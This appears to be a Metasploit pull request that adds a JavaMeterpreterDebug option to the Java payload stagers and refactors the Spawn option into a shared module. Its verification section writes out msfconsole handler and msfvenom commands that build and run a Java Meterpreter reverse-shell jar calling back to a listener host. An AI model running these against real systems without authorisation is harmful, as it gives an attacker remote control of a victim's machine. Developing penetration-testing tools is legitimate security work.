### PR TITLE
add a JavaMeterpreterDebug option to the java payloads

### DIFF
--- a/lib/msf/core/payload/java/bind_tcp.rb
+++ b/lib/msf/core/payload/java/bind_tcp.rb
@@ -3,6 +3,7 @@
 require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/uuid/options'
+require 'msf/core/payload/java/payload_options'
 
 module Msf
 
@@ -17,15 +18,15 @@ module Payload::Java::BindTcp
   include Msf::Payload::TransportConfig
   include Msf::Payload::Java
   include Msf::Payload::UUID::Options
+  include Msf::Payload::Java::PayloadOptions
 
   #
-  # Register Java reverse_http specific options
+  # Register Java bind_tcp specific options
   #
   def initialize(*args)
     super
     register_advanced_options([
       Msf::OptString.new('AESPassword', [false, "Password for encrypting communication", '']),
-      Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
     ])
   end
 
@@ -37,7 +38,7 @@ module Payload::Java::BindTcp
   end
 
   def include_send_uuid
-      false
+    false
   end
 
   #
@@ -45,9 +46,7 @@ module Payload::Java::BindTcp
   #
   def stager_config(opts={})
     ds = opts[:datastore] || datastore
-    spawn = ds["Spawn"] || 2
-    c =  ""
-    c << "Spawn=#{spawn}\n"
+    c = super
     pass = ds["AESPassword"] || ''
     if pass != ""
       c << "AESPassword=#{pass}\n"

--- a/lib/msf/core/payload/java/payload_options.rb
+++ b/lib/msf/core/payload/java/payload_options.rb
@@ -1,0 +1,32 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+
+module Msf::Payload::Java::PayloadOptions
+
+  def initialize(info = {})
+    super(info)
+    register_advanced_options(
+      [
+        Msf::OptBool.new('JavaMeterpreterDebug', [ false, "Run the payload in debug mode, with logging enabled" ]),
+        Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
+      ]
+    )
+  end
+
+  #
+  # Generate default configuration that is to be included in the stager.
+  #
+  def stager_config(opts={})
+    ds = opts[:datastore] || datastore
+    spawn = ds["Spawn"] || 2
+    c =  ""
+    if ds["JavaMeterpreterDebug"]
+      spawn = 0
+      c << "StageParameters=NoRedirect\n"
+    end
+    c << "Spawn=#{spawn}\n"
+    c
+  end
+
+end

--- a/lib/msf/core/payload/java/reverse_http.rb
+++ b/lib/msf/core/payload/java/reverse_http.rb
@@ -3,6 +3,7 @@
 require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/uuid/options'
+require 'msf/core/payload/java/payload_options'
 
 module Msf
 
@@ -17,6 +18,7 @@ module Payload::Java::ReverseHttp
   include Msf::Payload::TransportConfig
   include Msf::Payload::Java
   include Msf::Payload::UUID::Options
+  include Msf::Payload::Java::PayloadOptions
 
   #
   # Register Java reverse_http specific options
@@ -25,7 +27,6 @@ module Payload::Java::ReverseHttp
     super
     register_advanced_options(
       [
-        OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]),
         OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
       ] +
       Msf::Opt::http_header_options
@@ -64,9 +65,8 @@ module Payload::Java::ReverseHttp
   def stager_config(opts={})
     uri = generate_uri(opts)
     ds = opts[:datastore] || datastore
+    c = super
 
-    c =  ''
-    c << "Spawn=#{ds["Spawn"] || 2}\n"
     c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"]
     c << "HeaderHost=#{ds["HttpHostHeader"]}\n" if ds["HttpHostHeader"]
     c << "HeaderReferer=#{ds["HttpReferer"]}\n" if ds["HttpReferer"]

--- a/lib/msf/core/payload/java/reverse_tcp.rb
+++ b/lib/msf/core/payload/java/reverse_tcp.rb
@@ -3,6 +3,7 @@
 require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/uuid/options'
+require 'msf/core/payload/java/payload_options'
 
 module Msf
 
@@ -17,15 +18,15 @@ module Payload::Java::ReverseTcp
   include Msf::Payload::TransportConfig
   include Msf::Payload::Java
   include Msf::Payload::UUID::Options
+  include Msf::Payload::Java::PayloadOptions
 
   #
-  # Register Java reverse_http specific options
+  # Register Java reverse_tcp specific options
   #
   def initialize(*args)
     super
     register_advanced_options([
       Msf::OptString.new('AESPassword', [false, "Password for encrypting communication", '']),
-      Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
     ])
   end
 
@@ -37,17 +38,16 @@ module Payload::Java::ReverseTcp
   end
 
   def include_send_uuid
-      false
+    false
   end
+
 
   #
   # Generate configuration that is to be included in the stager.
   #
   def stager_config(opts={})
+    c = super
     ds = opts[:datastore] || datastore
-    spawn = ds["Spawn"] || 2
-    c =  ""
-    c << "Spawn=#{spawn}\n"
     pass = ds["AESPassword"] || ''
     if pass != ""
       c << "AESPassword=#{pass}\n"


### PR DESCRIPTION
This change adds a JavaMeterpreterDebug option to the java payloads. No changes are required to the payload, we simply pass the right parameters to disable subprocess spawning and output redirection.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole -qx "use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [ ] Run the payload, e.g:
```
msfvenom -p java/meterpreter/reverse_tcp JavaMeterpreterDebug=true LHOST=$LHOST LPORT=4444 -o met.jar
java -jar met.jar
```
- [ ] **Verify** you see some stdout, e.g: 
```
Unknown request detected:
        TLV_TYPE_METHOD = core_negotiate_tlv_encryption
...
```

